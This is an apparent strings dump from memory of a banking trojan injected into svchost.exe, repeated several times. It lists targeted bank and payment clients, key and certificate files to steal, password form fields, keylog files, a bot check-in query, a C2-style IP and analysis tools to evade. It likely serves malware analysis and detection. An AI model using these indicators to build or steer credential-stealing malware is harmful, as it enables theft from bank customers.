Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

SYSTEM!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\xodaql.exe

C:\Windows\system32\config\systemprofile\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_648_rwx_00200000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_648_rwx_00A20000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

WINUK0FFOO83I6!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\xodaql.exe

C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_700_rwx_01140000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_700_rwx_01740000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

